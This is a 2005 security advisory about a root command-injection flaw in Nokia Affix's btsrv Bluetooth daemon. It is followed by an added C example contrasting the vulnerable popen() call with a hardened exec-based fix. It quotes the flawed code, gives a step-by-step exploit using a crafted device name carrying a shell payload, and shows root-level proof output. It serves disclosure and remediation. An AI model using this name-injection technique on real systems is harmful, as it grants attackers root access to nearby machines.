DMA-2005-0826a.txt

28 Aug 2005 | Reported by Kevin Finisterre | Source: packetstorm (packetstormsecurity.com)

Nokia Affix Bluetooth vulnerability in btsrv.

`DMA[2005-0826a] - 'Nokia Affix Bluetooth btsrv poor use of popen()'  
Author: Kevin Finisterre  
Vendor: http://www-nrc.nokia.com/affix/, http://affix.sourceforge.net  
Product: 'affix'  
References:   
http://www.digitalmunition.com/DMA[2005-0826a].txt  
  
Description:   
Affix is a Bluetooth Protocol Stack for Linux that was developed by the Nokia Research Center in   
Helsinki and released under GPL. Affix supports the core Bluetooth protocols like HCI, L2CAP 1.1,   
L2CAP 1.2, RFCOMM, SDP and various Bluetooth profiles. Affix consists of 'affix-kernel' which   
provides kernel modules and 'affix' which provides control tools, libraries, and server daemons.  
  
Although Nokia believes that Affix is a useful piece of software, please bear in mind that it is   
not an official Nokia product, but a result of the research activity of Nokia Research Center.  
  
The following code snippet was found in affix-3.2.0/daemon/btsrv.c:  
  
int event_pin_code_request(struct PIN_Code_Request_Event *evt, int devnum)  
{  
...  
  
    /* name is filled from the remote device's Bluetooth friendly name,  
       i.e. data chosen by whoever is trying to pair */  
    err = HCI_RemoteNameRequest(fd, &dev, name);  
    if (err) {  
        BTDEBUG("Name request failed: %s", hci_error(err));  
...  
    /* the untrusted name is pasted into a shell command line; the surrounding  
       \"...\" offers no protection once the name itself contains a double quote */  
    sprintf(cmdline, "/etc/affix/btsrv-gui pin \"%s\" %s", name, bda2str(&evt->bda));  
    DBPRT("cmdline: [%s]", cmdline);  
    /* popen() hands the whole string to /bin/sh -c, so shell metacharacters  
       in the name are interpreted with the privileges of btsrv (root) */  
    fp = popen(cmdline, "r");  
    if (!fp) {  
        BTERROR("popen() failed");  
        goto err;  
    }  
    /* "%s" without a field width: the read into pin is also unbounded */  
    err = fscanf(fp, "%s", pin);  
    if (err == EOF) {  
        BTERROR("fscanf() failed");  
        pclose(fp);  
        goto err;  
    }  
  
Exploitation of this bug is easier than the BlueZ variation of the same attack. When exploiting   
BlueZ, the Bluetooth name cache must first be populated. On Affix, however, the call to   
HCI_RemoteNameRequest() fetches the name from the attacker's device on every PIN request, so the   
attack works instantly regardless of the name cache.   
  
The btsrv daemon must of course be running:  
root@animosity:~# btsrv  
btsrv: main: btsrv started [Affix 3.2.0].  
btsdpd: main: btsdpd Affix 3.2.0 started.  
btsrv: start_service: Bound service Dialup Networking to port 1  
btsrv: start_service: Bound service Dialup Networking Emulation to port 2  
btsrv: start_service: Bound service Fax Service to port 3  
btsrv: start_service: Bound service LAN Access to port 4  
btsrv: start_service: Bound service OBEX File Transfer to port 5  
btsrv: start_service: Bound service OBEX Object Push to port 6  
  
As an example I will use my iPAQ 2215 to attack an Affix box. First I set the Bluetooth name of   
my device to ";/usr/bin/id>/tmp/ooooo;" (the double quotes are part of the name: the first one   
closes the quoted %s in the sprintf() format, the ";" then terminates the btsrv-gui command, and   
the injected command runs before the remainder of the line is parsed).   
  
Next I start the attack by opening the bluetooth manager, clicking tools and going to Paired   
devices. Next I click Add, search for the target host and then double tap it. When prompted for  
a pin code I type in any random pin code and press enter.   
  
After a few moments I get an "Authentication failed!" message.  
  
On the screen where btsrv was started I see the following errors, which indicate an attack is   
in progress: btsrv-gui was invoked with an empty name and no address (hence the IndexError on   
sys.argv[3]), and the trailing fragment '"" <address>' after the injected command is an empty   
command name (hence "sh: : command not found").   
  
Traceback (most recent call last):  
File "/etc/affix/btsrv-gui", line 106, in ?  
pin = t.go("Connection from %s [%s]" % (sys.argv[2], sys.argv[3]))  
IndexError: list index out of range  
sh: : command not found  
btsrv: event_pin_code_request: fscanf() failed  
  
Looking in /tmp on the target device shows successful exploitation.   
  
root@animosity:~# ls -al /tmp/ooooo  
-rw-r--r-- 1 root root 134 2005-08-26 16:47 /tmp/ooooo  
root@animosity:~# cat /tmp/ooooo  
uid=0(root) gid=0(root) groups=0(root)  
  
Feel free to get creative with this... http://www.digitalmunition.com/BluezHCIDpwned.txt   
  
Official patches for Affix can be found at http://affix.sourceforge.net  
http://affix.sourceforge.net/patch_btsrv_affix_3_2_0  
http://affix.sourceforge.net/patch_btsrv_affix_2_1_2  
  
Timeline:  
08/06/2005 bluez 2.19 stomps my Affix bug and reveals that *someone* borrowed bad code again!  
08/18/2005 *sigh* I guess I should tell Nokia about the bug now.  
08/22/2005 Carlos.Chinea from nokia responds that he will "look to it asap and fix it also asap".  
08/26/2005 btsrv popen() call patch released  
  
Outtakes:  
"no, they copied from us.." - bluez  
"As far as I know, we didn't borrow code...So I guess they did then" - affix  
  
-KF  
  
  
`
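The following is an added example, not Affix code and not the official patch linked above. It rebuilds the vulnerable command line exactly as btsrv's sprintf() does (with snprintf so the example itself cannot overflow) for the remote name used in the advisory, and puts beside it a replacement for the popen() call that executes the helper directly with an argv array, so the name reaches it as one intact argument no matter what it contains, and reads the PIN with a bounded fgets() instead of fscanf("%s"). The sample address 00:11:22:33:44:55 is constructed, and /bin/echo stands in for /etc/affix/btsrv-gui so the program runs anywhere and prints what the helper would have received as arguments.

```c
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/wait.h>

/* Constructed sample input: the remote name from the advisory, including its
 * literal leading and trailing double quotes, plus an example address. */
static const char *ATTACKER_NAME = "\";/usr/bin/id>/tmp/ooooo;\"";
static const char *SAMPLE_BDA = "00:11:22:33:44:55";

/* Mirrors the vulnerable construction in btsrv.c. The quotes around %s do not
 * help: a quote inside the name closes them, and /bin/sh -c then sees the
 * rest of the name as further shell syntax. Returns the length written, or
 * -1 if the buffer was too small. */
int build_cmdline_vuln(char *out, size_t outlen, const char *name, const char *bda)
{
    int n = snprintf(out, outlen, "/etc/affix/btsrv-gui pin \"%s\" %s", name, bda);
    if (n < 0 || (size_t)n >= outlen)
        return -1;
    return n;
}

/* Hardened replacement for the popen() call: no shell is involved, the
 * helper is exec'd with a fixed argv, and the reply is read with a bounded
 * fgets(). Returns the helper's exit status, or -1 on a local failure. */
int run_pin_helper(const char *helper, const char *name, const char *bda,
                   char *pin, size_t pinlen)
{
    int pfd[2];
    if (pipe(pfd) != 0)
        return -1;

    pid_t pid = fork();
    if (pid < 0) {
        close(pfd[0]);
        close(pfd[1]);
        return -1;
    }
    if (pid == 0) {
        /* Child: route stdout into the pipe, then exec the helper directly.
         * name is one argv element; "; > " etc. in it are just bytes. */
        dup2(pfd[1], STDOUT_FILENO);
        close(pfd[0]);
        close(pfd[1]);
        execl(helper, helper, "pin", name, bda, (char *)NULL);
        _exit(127);
    }

    /* Parent: read the first line the helper prints, at most pinlen-1 bytes. */
    close(pfd[1]);
    FILE *fp = fdopen(pfd[0], "r");
    if (!fp) {
        close(pfd[0]);
        waitpid(pid, NULL, 0);
        return -1;
    }
    pin[0] = '\0';
    if (fgets(pin, (int)pinlen, fp))
        pin[strcspn(pin, "\n")] = '\0';
    fclose(fp);

    int status = 0;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void)
{
    char cmdline[512];
    if (build_cmdline_vuln(cmdline, sizeof cmdline, ATTACKER_NAME, SAMPLE_BDA) > 0)
        printf("popen() would hand the shell: %s\n", cmdline);

    /* /bin/echo in place of btsrv-gui: its output is exactly the argv the
     * helper received, showing the name arrived as a single argument. */
    char pin[128];
    int rc = run_pin_helper("/bin/echo", ATTACKER_NAME, SAMPLE_BDA, pin, sizeof pin);
    printf("helper exit status %d, helper saw: %s\n", rc, pin);
    return 0;
}
```

In the vulnerable string the shell sees `pin ""` (an empty name and no address, which is the IndexError in the advisory), then `;/usr/bin/id>/tmp/ooooo;`, then `"" 00:11:22:33:44:55` (an empty command name, which is the "sh: : command not found"). With the exec-based version the helper receives the name verbatim and nothing is run as root that the helper did not start itself.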
